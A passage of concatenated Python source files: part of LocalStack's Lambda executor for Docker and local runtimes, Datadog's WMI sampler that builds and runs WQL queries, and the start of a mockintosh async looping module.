self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def execute_in_container(
self, func_details, env_vars, command, stdin=None, background=False
) -> Tuple[bytes, bytes]:
func_arn = func_details.arn()
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars["_LAMBDA_SERVER_PORT"] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug(
'Priming docker container with runtime "%s" and arn "%s".',
runtime,
func_arn,
)
container_info = self.prime_docker_container(func_details, dict(env_vars), lambda_cwd)
if not command and handler:
command = container_info.entry_point.split()
command.append(handler)
# determine files to be copied into the container
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
DOCKER_CLIENT.copy_into_container(
container_info.name, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER
)
return DOCKER_CLIENT.exec_in_container(
container_name_or_id=container_info.name,
command=command,
interactive=True,
env_vars=env_vars,
stdin=stdin,
)
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, func_details, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param func_details: The Details of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = func_details.arn()
container_name = self.get_container_name(func_arn)
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming Docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(func_details)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug("Creating container: %s" % container_name)
self.create_container(func_details, env_vars, lambda_cwd)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug(
'Copying files to container "%s" from "%s".' % (container_name, lambda_cwd)
)
DOCKER_CLIENT.copy_into_container(
container_name, "%s/." % lambda_cwd, DOCKER_TASK_FOLDER
)
LOG.debug("Starting container: %s" % container_name)
DOCKER_CLIENT.start_container(container_name)
# give the container some time to start up
time.sleep(1)
container_network = self.get_docker_container_network(func_arn)
entry_point = DOCKER_CLIENT.get_image_entrypoint(docker_image)
LOG.debug(
'Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network)
)
return ContainerInfo(container_name, entry_point)
def create_container(self, func_details, env_vars, lambda_cwd):
docker_image = Util.docker_image_for_lambda(func_details)
container_name = self.get_container_name(func_details.arn())
# make sure we set LOCALSTACK_HOSTNAME
if not env_vars.get("LOCALSTACK_HOSTNAME"):
main_endpoint = get_main_endpoint_from_container()
env_vars["LOCALSTACK_HOSTNAME"] = main_endpoint
# make sure AWS_LAMBDA_EVENT_BODY is not set (otherwise causes issues with "docker exec ..." above)
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
network = config.LAMBDA_DOCKER_NETWORK
additional_flags = config.LAMBDA_DOCKER_FLAGS
dns = config.LAMBDA_DOCKER_DNS
mount_volumes = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if ":" in lambda_cwd and "\\" in lambda_cwd:
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volumes = [(lambda_cwd_on_host, DOCKER_TASK_FOLDER)] if mount_volumes else None
if os.environ.get("HOSTNAME"):
env_vars["HOSTNAME"] = os.environ.get("HOSTNAME")
env_vars["EDGE_PORT"] = config.EDGE_PORT
return DOCKER_CLIENT.create_container(
image_name=docker_image,
remove=True,
interactive=True,
name=container_name,
entrypoint="/bin/bash",
network=network,
env_vars=env_vars,
dns=dns,
mount_volumes=mount_volumes,
additional_flags=additional_flags,
)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug("Stopping container: %s" % container_name)
DOCKER_CLIENT.stop_container(container_name)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug("Removing container: %s" % container_name)
rm_docker_container(container_name, safe=True)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug("Getting all lambda containers names.")
list_result = DOCKER_CLIENT.list_containers(filter="name=localstack_lambda_*")
container_names = list(map(lambda container: container["name"], list_result))
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug("Removing %d containers." % len(container_names))
for container_name in container_names:
DOCKER_CLIENT.remove_container(container_name)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
container_status = DOCKER_CLIENT.get_container_status(container_name)
return container_status.value
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ""
# Get the container name.
container_name = self.get_container_name(func_arn)
container_network = DOCKER_CLIENT.get_network(container_name)
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug("Checking if there are idle containers ...")
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return "localstack_lambda_" + re.sub(r"[^a-zA-Z0-9_.-]", "_", func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment["DOCKER_LAMBDA_USE_STDIN"] = "1"
return event_body.encode()
def execute_in_container(
self, func_details, env_vars, command, stdin=None, background=False
) -> Tuple[bytes, bytes]:
lambda_cwd = func_details.cwd
handler = func_details.handler
entrypoint = None
if command:
entrypoint = ""
elif handler:
command = handler
else:
command = None
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK or None
if network == "host":
port = get_free_tcp_port()
env_vars["DOCKER_LAMBDA_API_PORT"] = port
env_vars["DOCKER_LAMBDA_RUNTIME_PORT"] = port
additional_flags = config.LAMBDA_DOCKER_FLAGS or ""
dns = config.LAMBDA_DOCKER_DNS
docker_java_ports = bootstrap.PortMappings()
if Util.debug_java_port:
docker_java_ports.add(Util.debug_java_port)
docker_image = Util.docker_image_for_lambda(func_details)
if config.LAMBDA_REMOTE_DOCKER:
container_id = DOCKER_CLIENT.create_container(
image_name=docker_image,
interactive=True,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
ports=docker_java_ports,
command=command,
)
DOCKER_CLIENT.copy_into_container(container_id, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER)
return DOCKER_CLIENT.start_container(
container_id, interactive=not background, attach=not background, stdin=stdin
)
else:
mount_volumes = None
if lambda_cwd:
mount_volumes = [
(Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
]
return DOCKER_CLIENT.run_container(
image_name=docker_image,
interactive=True,
detach=background,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
command=command,
mount_volumes=mount_volumes,
stdin=stdin,
)
class LambdaExecutorLocal(LambdaExecutor):
def _execute_in_custom_runtime(self, cmd: str, func_details=None) -> InvocationResult:
"""
Generic run function for executing lambdas in custom runtimes.
:param cmd: the command to execute
:param func_details: function details
:return: the InvocationResult
"""
kwargs = {"stdin": True, "inherit_env": True, "asynchronous": True}
process = run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate()
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
# TODO: not sure if this code is needed/used
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = func_details and func_details.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise InvocationException(
"Lambda process returned error status code: %s. Result: %s. Output:\n%s"
% (return_code, result, log_output),
log_output,
result,
)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def _execute(
self, func_arn, func_details, event, context=None, version=None
) -> InvocationResult:
lambda_cwd = func_details.cwd
environment = self._prepare_environment(func_details)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, "")
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
except Exception as e:
result = str(e)
sys.stderr.write("%s %s" % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (
request_id,
func_arn,
)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ("\n" if log_output else "") + stream
log_output += "\nEND RequestId: %s" % request_id
log_output += "\nREPORT RequestId: %s Duration: %s ms" % (
request_id,
int((end_time - start_time) * 1000),
)
# store logs to CloudWatch
_store_logs(func_details, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info(
'Error executing Lambda "%s": %s %s'
% (func_arn, error, "".join(traceback.format_tb(error.__traceback__)))
)
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def execute_java_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ""
event_file = EVENT_FILE_PATTERN.replace("*", short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
class_name = handler.split("::")[0]
classpath = "%s:%s:%s" % (
main_file,
Util.get_java_classpath(main_file),
LAMBDA_EXECUTOR_JAR,
)
cmd = "java %s -cp %s %s %s %s" % (
opts,
classpath,
LAMBDA_EXECUTOR_CLASS,
class_name,
event_file,
)
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, func_details=func_details)
return result
def execute_javascript_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
function = handler.split(".")[-1]
event_json_string = "%s" % (json.dumps(json_safe(event)) if event else "{}")
context_json_string = "%s" % (json.dumps(context.__dict__) if context else "{}")
cmd = (
"node -e 'require(\"%s\").%s(%s,%s).then(r => process.stdout.write(JSON.stringify(r)))'"
% (
main_file,
function,
event_json_string,
context_json_string,
)
)
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ""
# Replace _debug_port_ with a random free port
if "_debug_port_" in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace("_debug_port_", ("%s" % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match(".*address=(.+:)?(\\d+).*", opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r"^%s/(.*)$" % config.TMP_FOLDER, r"%s/\1" % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(":", "").replace("\\", "/")
if len(temp) >= 1 and temp[:1] != "/":
temp = "/" + temp
temp = "%s%s" % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_lambda(cls, func_details):
runtime = func_details.runtime or ""
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = [
"dotnetcore2.0",
"dotnetcore2.1",
"python3.6",
"python3.7",
]
if docker_image == "lambci/lambda" and any(
img in docker_tag for img in lambdas_to_add_prefix
):
docker_tag = "20191117-%s" % docker_tag
if runtime == "nodejs14.x":
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = "localstack/lambda-js"
return "%s:%s" % (docker_image, docker_tag)
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ["."]
base_dir = os.path.dirname(archive)
for pattern in ["%s/*.jar", "%s/lib/*.jar", "%s/java/lib/*.jar", "%s/*.zip"]:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append("*.jar")
entries.append("java/lib/*.jar")
result = ":".join(entries)
return result
@staticmethod
def mountable_tmp_file():
f = os.path.join(config.TMP_FOLDER, short_uid())
TMP_FILES.append(f)
return f
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
"local": EXECUTOR_LOCAL,
"docker": EXECUTOR_CONTAINERS_SEPARATE,
"docker-reuse": EXECUTOR_CONTAINERS_REUSE,
}
|
sampler.py
|
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
# flake8: noqa
"""
A lightweight Python WMI module wrapper built on top of `pywin32` and `win32com` extensions.
**Specifications**
* Based on top of the `pywin32` and `win32com` third party extensions only
* Compatible with `Raw`* and `Formatted` Performance Data classes
* Dynamically resolve properties' counter types
* Hold the previous/current `Raw` samples to compute/format new values*
* Fast and lightweight
* Avoid queries overhead
* Cache connections and qualifiers
* Use `wbemFlagForwardOnly` flag to improve enumeration/memory performance
*\* `Raw` data formatting relies on the avaibility of the corresponding calculator.
Please refer to `checks.lib.wmi.counter_type` for more information*
Original discussion thread: https://github.com/DataDog/dd-agent/issues/1952
Credits to @TheCloudlessSky (https://github.com/TheCloudlessSky)
"""
from copy import deepcopy
from threading import Event, Thread
import pythoncom
import pywintypes
from six import iteritems, string_types, with_metaclass
from six.moves import zip
from win32com.client import Dispatch
from .counter_type import UndefinedCalculator, get_calculator, get_raw
class CaseInsensitiveDict(dict):
def __setitem__(self, key, value):
super(CaseInsensitiveDict, self).__setitem__(key.lower(), value)
def __getitem__(self, key):
return super(CaseInsensitiveDict, self).__getitem__(key.lower())
def __contains__(self, key):
return super(CaseInsensitiveDict, self).__contains__(key.lower())
def get(self, key):
return super(CaseInsensitiveDict, self).get(key.lower())
def copy(self):
"""
Explicit copy to ensure we return an instance of `CaseInsensitiveDict`
"""
return CaseInsensitiveDict(self)
class ProviderArchitectureMeta(type):
"""
Metaclass for ProviderArchitecture.
"""
def __contains__(cls, provider):
"""
Support `Enum` style `contains`.
"""
return provider in cls._AVAILABLE_PROVIDER_ARCHITECTURES
class ProviderArchitecture(with_metaclass(ProviderArchitectureMeta, object)):
"""
Enumerate WMI Provider Architectures.
"""
# Available Provider Architecture(s)
DEFAULT = 0
_32BIT = 32
_64BIT = 64
_AVAILABLE_PROVIDER_ARCHITECTURES = frozenset([DEFAULT, _32BIT, _64BIT])
class WMISampler(object):
"""
WMI Sampler.
"""
def __init__(
self,
logger,
class_name,
property_names,
filters="",
host="localhost",
namespace="root\\cimv2",
provider=None,
username="",
password="",
and_props=None,
timeout_duration=10,
):
# Properties
self._provider = None
self._formatted_filters = None
# Type resolution state
self._property_counter_types = None
# Samples
self._current_sample = None
self._previous_sample = None
# Sampling state
self._sampling = False
self._stopping = False
self.logger = logger
# Connection information
self.host = host
self.namespace = namespace
self.provider = provider
self.username = username
self.password = password
self.is_raw_perf_class = "_PERFRAWDATA_" in class_name.upper()
# Sampler settings
# WMI class, properties, filters and counter types
# Include required properties for making calculations with raw
# performance counters:
# https://msdn.microsoft.com/en-us/library/aa394299(v=vs.85).aspx
if self.is_raw_perf_class:
property_names.extend(
[
"Timestamp_Sys100NS",
"Frequency_Sys100NS",
# IMPORTANT: To improve performance and since they're currently
# not needed, do not include the other Timestamp/Frequency
# properties:
# - Timestamp_PerfTime
# - Timestamp_Object
# - Frequency_PerfTime
# - Frequency_Object"
]
)
self.class_name = class_name
self.property_names = property_names
self.filters = filters
self._and_props = and_props if and_props is not None else []
self._timeout_duration = timeout_duration
self._runSampleEvent = Event()
self._sampleCompleteEvent = Event()
self._sampler_thread = None
def start(self):
"""
Start internal thread for sampling
"""
self._sampler_thread = Thread(target=self._query_sample_loop, name=self.class_name)
self._sampler_thread.daemon = True # Python 2 does not support daemon as Thread constructor parameter
self._sampler_thread.start()
def stop(self):
"""
Dispose of the internal thread
"""
self._stopping = True
self._runSampleEvent.set()
self._sampleCompleteEvent.wait()
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, traceback):
self.stop()
def _query_sample_loop(self):
try:
# Initialize COM for the current (dedicated) thread
# WARNING: any python COM object (locator, connection, etc) created in a thread
# shouldn't be used in other threads (can lead to memory/handle leaks if done
# without a deep knowledge of COM's threading model).
pythoncom.CoInitialize()
except Exception as e:
self.logger.info("exception in CoInitialize: %s", e)
raise
while True:
self._runSampleEvent.wait()
if self._stopping:
self.logger.debug("_query_sample_loop stopping")
self._sampleCompleteEvent.set()
return
self._runSampleEvent.clear()
if self.is_raw_perf_class and not self._previous_sample:
self._current_sample = self._query()
self._previous_sample = self._current_sample
self._current_sample = self._query()
self._sampleCompleteEvent.set()
@property
def provider(self):
"""
Return the WMI provider.
"""
return self._provider
@provider.setter
def provider(self, value):
"""
Validate and set a WMI provider. Default to `ProviderArchitecture.DEFAULT`
"""
result = None
# `None` defaults to `ProviderArchitecture.DEFAULT`
defaulted_value = value or ProviderArchitecture.DEFAULT
try:
parsed_value = int(defaulted_value)
except ValueError:
pass
else:
if parsed_value in ProviderArchitecture:
result = parsed_value
if result is None:
self.logger.error(u"Invalid '%s' WMI Provider Architecture. The parameter is ignored.", value)
self._provider = result or ProviderArchitecture.DEFAULT
@property
def connection(self):
"""
A property to retrieve the sampler connection information.
"""
return {'host': self.host, 'namespace': self.namespace, 'username': self.username, 'password': self.password}
@property
def connection_key(self):
"""
Return an index key used to cache the sampler connection.
"""
return "{host}:{namespace}:{username}".format(host=self.host, namespace=self.namespace, username=self.username)
@property
def formatted_filters(self):
"""
Cache and return filters as a comprehensive WQL clause.
"""
if not self._formatted_filters:
filters = deepcopy(self.filters)
self._formatted_filters = self._format_filter(filters, self._and_props)
return self._formatted_filters
def reset_filter(self, new_filters):
self.filters = new_filters
# get rid of the formatted filters so they'll be recalculated
self._formatted_filters = None
def sample(self):
"""
Compute new samples.
"""
self._sampling = True
self._runSampleEvent.set()
while not self._sampleCompleteEvent.wait(timeout=float(self._timeout_duration)):
if not self._sampler_thread.is_alive():
raise Exception("The sampler thread terminated unexpectedly")
self._sampleCompleteEvent.clear()
self._sampling = False
def __len__(self):
"""
Return the number of WMI Objects in the current sample.
"""
# No data is returned while sampling
if self._sampling:
raise TypeError(u"Sampling `WMISampler` object has no len()")
return len(self._current_sample)
def __iter__(self):
"""
Iterate on the current sample's WMI Objects and format the property values.
"""
# No data is returned while sampling
if self._sampling:
raise TypeError(u"Sampling `WMISampler` object is not iterable")
if self.is_raw_perf_class:
# Format required
for previous_wmi_object, current_wmi_object in zip(self._previous_sample, self._current_sample):
formatted_wmi_object = self._format_property_values(previous_wmi_object, current_wmi_object)
yield formatted_wmi_object
else:
# No format required
for wmi_object in self._current_sample:
yield wmi_object
def __getitem__(self, index):
"""
Get the specified formatted WMI Object from the current sample.
"""
if self.is_raw_perf_class:
previous_wmi_object = self._previous_sample[index]
current_wmi_object = self._current_sample[index]
formatted_wmi_object = self._format_property_values(previous_wmi_object, current_wmi_object)
return formatted_wmi_object
else:
return self._current_sample[index]
def __eq__(self, other):
"""
Equality operator is based on the current sample.
"""
return self._current_sample == other
def __str__(self):
"""
Stringify the current sample's WMI Objects.
"""
return str(self._current_sample)
def _get_property_calculator(self, counter_type):
"""
Return the calculator for the given `counter_type`.
Fallback with `get_raw`.
"""
calculator = get_raw
try:
calculator = get_calculator(counter_type)
except UndefinedCalculator:
self.logger.warning(
u"Undefined WMI calculator for counter_type %s. Values are reported as RAW.", counter_type
)
return calculator
def _format_property_values(self, previous, current):
"""
Format WMI Object's RAW data based on the previous sample.
Do not override the original WMI Object !
"""
formatted_wmi_object = CaseInsensitiveDict()
for property_name, property_raw_value in iteritems(current):
counter_type = self._property_counter_types.get(property_name)
property_formatted_value = property_raw_value
if counter_type:
calculator = self._get_property_calculator(counter_type)
property_formatted_value = calculator(previous, current, property_name)
formatted_wmi_object[property_name] = property_formatted_value
return formatted_wmi_object
def get_connection(self):
"""
Create a new WMI connection
"""
self.logger.debug(
u"Connecting to WMI server (host=%s, namespace=%s, provider=%s, username=%s).",
self.host,
self.namespace,
self.provider,
self.username,
)
additional_args = []
if self.provider != ProviderArchitecture.DEFAULT:
context = Dispatch("WbemScripting.SWbemNamedValueSet")
context.Add("__ProviderArchitecture", self.provider)
additional_args = [None, "", 128, context]
locator = Dispatch("WbemScripting.SWbemLocator")
connection = locator.ConnectServer(self.host, self.namespace, self.username, self.password, *additional_args)
return connection
@staticmethod
def _format_filter(filters, and_props=[]):
"""
Transform filters to a comprehensive WQL `WHERE` clause.
Specifying more than 1 filter defaults to an `OR` operator in the `WHERE` clause.
Builds filter from a filter list.
- filters: expects a list of dicts, typically:
- [{'Property': value},...] or
- [{'Property': [comparison_op, value]},...]
NOTE: If we just provide a value we default to '=' comparison operator.
Otherwise, specify the operator in a list as above: [comp_op, value]
If we detect a wildcard character ('%') we will override the operator
to use LIKE
"""
def build_where_clause(fltr):
f = fltr.pop()
wql = ""
while f:
prop, value = f.popitem()
if isinstance(value, (tuple, list)) and len(value) == 2 and isinstance(value[0], string_types):
oper = value[0]
value = value[1]
elif isinstance(value, string_types) and '%' in value:
oper = 'LIKE'
else:
oper = '='
if isinstance(value, (tuple, list)):
if not len(value):
continue
internal_filter = map(
lambda x: (prop, x)
if isinstance(x, (tuple, list))
else (prop, ('LIKE', x))
if '%' in x
else (prop, (oper, x)),
value,
)
bool_op = ' OR '
for p in and_props:
if p.lower() in prop.lower():
bool_op = ' AND '
break
clause = bool_op.join(
[
'{0} {1} \'{2}\''.format(k, v[0], v[1])
if isinstance(v, (list, tuple))
else '{0} = \'{1}\''.format(k, v)
for k, v in internal_filter
]
)
if bool_op.strip() == 'OR':
wql += "( {clause} )".format(clause=clause)
else:
wql += "{clause}".format(clause=clause)
else:
wql += "{property} {cmp} '{constant}'".format(property=prop, cmp=oper, constant=value)
if f:
wql += " AND "
# empty list skipped
if wql.endswith(" AND "):
wql = wql[:-5]
if len(fltr) == 0:
return "( {clause} )".format(clause=wql)
return "( {clause} ) OR {more}".format(clause=wql, more=build_where_clause(fltr))
if not filters:
return ""
return " WHERE {clause}".format(clause=build_where_clause(filters))
def _query(self): # pylint: disable=E0202
"""
Query WMI using WMI Query Language (WQL) & parse the results.
Returns: List of WMI objects or `TimeoutException`.
"""
try:
formated_property_names = ",".join(self.property_names)
wql = "Select {property_names} from {class_name}{filters}".format(
property_names=formated_property_names, class_name=self.class_name, filters=self.formatted_filters
)
self.logger.debug(u"Querying WMI: %s", wql)
except Exception as e:
self.logger.error(str(e))
return []
try:
# From: https://msdn.microsoft.com/en-us/library/aa393866(v=vs.85).aspx
flag_return_immediately = 0x10 # Default flag.
flag_forward_only = 0x20
flag_use_amended_qualifiers = 0x20000
query_flags = flag_return_immediately | flag_forward_only
# For the first query, cache the qualifiers to determine each
# propertie's "CounterType"
includes_qualifiers = self.is_raw_perf_class and self._property_counter_types is None
if includes_qualifiers:
self._property_counter_types = CaseInsensitiveDict()
query_flags |= flag_use_amended_qualifiers
raw_results = self.get_connection().ExecQuery(wql, "WQL", query_flags)
results = self._parse_results(raw_results, includes_qualifiers=includes_qualifiers)
except pywintypes.com_error:
self.logger.warning(u"Failed to execute WMI query (%s)", wql, exc_info=True)
results = []
return results
def _parse_results(self, raw_results, includes_qualifiers):
"""
Parse WMI query results in a more comprehensive form.
Returns: List of WMI objects
```
[
{
'freemegabytes': 19742.0,
'name': 'C:',
'avgdiskbytesperwrite': 1536.0
}, {
'freemegabytes': 19742.0,
'name': 'D:',
'avgdiskbytesperwrite': 1536.0
}
]
```
"""
results = []
for res in raw_results:
# Ensure all properties are available. Use case-insensitivity
# because some properties are returned with different cases.
item = CaseInsensitiveDict()
for prop_name in self.property_names:
item[prop_name] = None
for wmi_property in res.Properties_:
# IMPORTANT: To improve performance, only access the Qualifiers
# if the "CounterType" hasn't already been cached.
should_get_qualifier_type = (
includes_qualifiers and wmi_property.Name not in self._property_counter_types
)
if should_get_qualifier_type:
# Can't index into "Qualifiers_" for keys that don't exist
# without getting an exception.
qualifiers = dict((q.Name, q.Value) for q in wmi_property.Qualifiers_)
# Some properties like "Name" and "Timestamp_Sys100NS" do
# not have a "CounterType" (since they're not a counter).
# Therefore, they're ignored.
if "CounterType" in qualifiers:
counter_type = qualifiers["CounterType"]
self._property_counter_types[wmi_property.Name] = counter_type
self.logger.debug(
u"Caching property qualifier CounterType: %s.%s = %s",
self.class_name,
wmi_property.Name,
counter_type,
)
else:
self.logger.debug(
u"CounterType qualifier not found for %s.%s", self.class_name, wmi_property.Name
)
try:
item[wmi_property.Name] = float(wmi_property.Value)
except (TypeError, ValueError):
item[wmi_property.Name] = wmi_property.Value
results.append(item)
return results
|
_looping.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: __init__
:synopsis: module that contains asynchronous looping related methods.
"""
import sys
import threading
from mockintosh.services.asynchronous import AsyncService, AsyncConsumerGroup, AsyncActor, AsyncProducer, AsyncConsumer
from mockintosh.services.asynchronous.kafka import KafkaConsumerGroup # noqa: F401
from mockintosh.services.asynchronous.amqp import AmqpConsumerGroup # noqa: F401
from mockintosh.services.asynchronous.redis import RedisConsumerGroup # noqa: F401
try:
from mockintosh.services.asynchronous.gpubsub import GpubsubConsumerGroup # noqa: F401
except ModuleNotFoundError:
pass
try:
from mockintosh.services.asynchronous.amazonsqs import AmazonsqsConsumerGroup # noqa: F401
except ModuleNotFoundError:
pass
from mockintosh.services.asynchronous.mqtt import MqttConsumerGroup # noqa: F401
def run_loops():
for service in AsyncService.services:
class_name_prefix = service.type.capitalize()
consumer_groups = {}
for actor in service.actors:
t = threading.Thread(target=actor.run_produce_loop, args=(), kwargs={})
t.daemon = True
t.start()
if actor.consumer is not None:
if actor.consumer.topic not in consumer_groups.keys():
